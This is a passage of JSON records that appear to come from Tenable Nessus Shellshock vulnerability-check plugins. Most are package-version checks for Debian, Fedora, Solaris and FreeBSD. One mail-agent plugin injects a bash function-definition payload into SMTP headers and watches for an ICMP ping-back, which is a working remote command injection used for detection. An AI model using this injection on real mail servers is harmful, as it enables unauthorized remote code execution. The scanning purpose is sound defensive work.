script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bash\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-builtins\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-doc\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-static\", reference:\"4.1-3+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:32", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-11527.NASL", "href": "https://www.tenable.com/plugins/nessus/77941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11527.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77941);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5e2549\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.48-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:45", "description": "The remote host appears to be running a mail transfer or mail delivery agent such as Courier, Exim, Postfix, or Procmail. Many of these agents can be configured to run utility scripts for a diverse number of tasks including filtering, sorting, and delivering mail. These scripts may create the conditions that are exploitable, making the agent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that the mail agent running on the system is not configured in such a way to allow remote execution via Shellshock.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-28T00:00:00", "type": "nessus", "title": "Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_MAIL_AGENTS.NASL", "href": "https://www.tenable.com/plugins/nessus/78701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78701);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a mail agent installed that allows remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a mail transfer or mail delivery\nagent such as Courier, Exim, Postfix, or Procmail. Many of these\nagents can be configured to run utility scripts for a diverse number\nof tasks including filtering, sorting, and delivering mail. These\nscripts may create the conditions that are exploitable, making the\nagent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that the mail\nagent running on the system is not configured in such a way to allow\nremote execution via Shellshock.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\"\n);\n\n#########################################################################################\n# Build header/data attacks\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; /bin/ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n#########################################################################################\n# Send attack data\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif (isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Mail Agent\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif (empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif (hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif (header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif (report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:20", "description": "SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079.NASL", "href": "https://www.tenable.com/plugins/nessus/78112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78112);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-03\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149079-03\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-03\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while processing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A similar vulnerability was discovered and tagged as CVE-2014-7169.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bash", "p-cpe:/a:freebsd:freebsd:bash-static", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "href": "https://www.tenable.com/plugins/nessus/77836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77836);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while\nprocessing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A\nsimilar vulnerability was discovered and tagged as CVE-2014-7169.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q3/690\");\n # https://vuxml.freebsd.org/freebsd/71ad81da-4414-11e4-a33e-3c970e169bc2.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ec4245a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.5_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:02:46", "description": "The remote host appears to be running CUPS with the web-based interface enabled. A remote attacker can exploit CUPS to execute arbitrary commands via crafted fields during the creation or modification of a printer. The 'PRINTER_INFO' and 'PRINTER_LOCATION' fields can be configured to contain arbitrary commands which will be executed when a print job is submitted, provided the remote host is running a vulnerable version of Bash.\n\nThis plugin attempts to exploit this flaw by using user-supplied credentials to access the CUPS server and create a printer, then submitting a print request.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-08T00:00:00", "type": "nessus", "title": "CUPS Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-02-14T00:00:00", "cpe": ["cpe:/a:apple:cups", "cpe:/a:gnu:bash"], "id": "CUPS_BASH_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/79804", "sourceData": "Binary data cups_bash_rce.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "The remote Mac OS X host has a version of Bash prior to 3.2.53(1)-release installed. It is, therefore, affected by a command injection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:gnu:bash"], "id": "MACOSX_SHELLSHOCK_UPDATE.NASL", "href": "https://www.tenable.com/plugins/nessus/77971", "sourceData": "#TRUSTED 